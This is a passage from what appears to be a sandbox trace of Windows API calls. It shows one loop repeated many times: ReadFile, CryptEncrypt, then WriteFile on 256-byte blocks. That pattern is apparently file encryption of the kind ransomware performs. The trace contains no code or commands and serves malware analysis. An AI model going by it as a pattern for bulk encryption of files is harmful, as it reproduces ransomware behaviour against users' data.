lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.367] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.367] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.367] GetLastError () returned 0x0 [0149.367] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.367] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.367] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.368] GetLastError () returned 0x0 [0149.368] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.368] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.368] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.368] GetLastError () returned 0x0 [0149.368] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.368] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.368] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.368] GetLastError () returned 0x0 [0149.368] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.368] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.368] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.368] GetLastError () returned 0x0 [0149.368] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.368] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.368] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.368] GetLastError () returned 0x0 [0149.368] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.368] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.368] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.368] GetLastError () returned 0x0 [0149.368] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.368] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.368] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.368] GetLastError () returned 0x0 [0149.368] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.369] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.369] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.369] GetLastError () returned 0x0 [0149.369] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.369] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.369] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.369] GetLastError () returned 0x0 [0149.369] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.369] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.369] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.369] GetLastError () returned 0x0 [0149.369] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.369] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.369] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.369] GetLastError () returned 0x0 [0149.369] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.369] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.369] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.369] GetLastError () returned 0x0 [0149.369] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.369] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.369] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.369] GetLastError () returned 0x0 [0149.369] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.369] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.370] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.370] GetLastError () returned 0x0 [0149.370] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.370] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.370] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.370] GetLastError () returned 0x0 [0149.370] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.370] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.370] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.370] GetLastError () returned 0x0 [0149.370] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.370] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.370] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.370] GetLastError () returned 0x0 [0149.370] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.370] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.370] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.370] GetLastError () returned 0x0 [0149.370] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.370] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.370] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.370] GetLastError () returned 0x0 [0149.370] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.370] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.370] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.370] GetLastError () returned 0x0 [0149.371] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.371] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.371] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.371] GetLastError () returned 0x0 [0149.371] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.371] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.371] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.371] GetLastError () returned 0x0 [0149.371] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.371] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.371] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.371] GetLastError () returned 0x0 [0149.371] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.371] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.371] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.371] GetLastError () returned 0x0 [0149.371] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.371] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.371] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.371] GetLastError () returned 0x0 [0149.371] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.371] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.371] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.371] GetLastError () returned 0x0 [0149.371] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.372] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.372] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.372] GetLastError () returned 0x0 [0149.372] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.372] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.372] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.372] GetLastError () returned 0x0 [0149.372] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.372] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.372] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.372] GetLastError () returned 0x0 [0149.372] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.372] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.372] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.372] GetLastError () returned 0x0 [0149.372] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.372] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.372] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.372] GetLastError () returned 0x0 [0149.372] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.372] 